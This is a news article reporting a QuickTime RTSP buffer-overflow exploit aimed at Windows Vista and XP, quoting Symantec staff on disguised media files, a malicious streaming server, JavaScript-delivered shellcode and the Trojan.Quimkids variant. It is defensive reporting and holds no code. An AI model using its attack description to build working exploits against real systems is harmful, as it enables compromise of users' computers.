14 DAY TRIAL // An exploit tailored on a zero-day vulnerability impacting Apple's QuickTime media player is gunning for Windows Vista. Initially, the Apple QuickTime RTSP Response Header Content-Length remote buffer overflow vulnerability was less likely to impact Microsoft's latest Windows client due to the mitigations set in place when using browsers such as Internet Explorer 6/7 and Safari 3 Beta. The open source Firefox browser is more susceptible to attacks because of the way it handles QuickTime content, dealing with requests as separate processes, and not as IE and Safari, which both call the media player as a plug-in. Of course that actual malformed .mov, .qt, qtl., gsm, .3gp etc. files that are masquerading as video materials while being nothing more than malicious XML files, when executed, would trigger the exploit independent of the browser the user is running.
"The attachment is not actually a media file, but instead it is an XML file which will force the player to open an RTSP connection on port 554 to the malicious server hosting the exploit. When the QuickTime Player contacts the remote server, it receives back the malformed RTSP response which triggers the buffer overflow and the execution of the attacker's shellcode immediately. This attack requires users to double-click on the QuickTime multimedia attachment to run. (...) In the Web browser attack scenario, the attack will most likely start with a hyperlinked URL sent to the user. When the user clicks on the URL, the browser loads a page that has a QuickTime streaming object embedded in it. The object initiates the RTSP connection to the malicious server on port 554 and exploit code is sent in response", explained Elia Florio, Symantec Security Response Engineer.
Security company Symantec subsequently informed that the original proof-of-concept code that was released in the wide evolved, and is now pushing a Trojan Horse that is able to compromise both Windows Vista and Windows XP. Detected as Trojan.Quimkids, the proof-of-concept Trojan is set up to exploit the QuickTime RTSP vulnerability. With the evolution of the exploit, the malicious RTSP data stream is no longer essential to the attacks as the shell code is now served through JavaScript. As no patch is available yet, Symantec advised users not to allow RSTP protocol on their networks as well as to disable QuickTime browser objects and JavaScript.
"A client requests a Web page from a malicious site. The page that is sent contains malicious shell code and a request for a QuickTime movie. If the client is using Internet Explorer, the shell code is written to a heap area for later use. Meanwhile, the browser receives the QuickTime movie and then opens it with QuickTime, creating an RTSP stream to the malicious server. Only the RTSP server in this scenario is hosting a hacked version, which actually sends back a stream that overwrites the stack in the client's QuickTime install. The end of the buffer overflow then calls the shell code that was previously written to the heap, and voila!, the malicious code is executed", stated Ben Nahorney, Senior Information Developer at Symantec.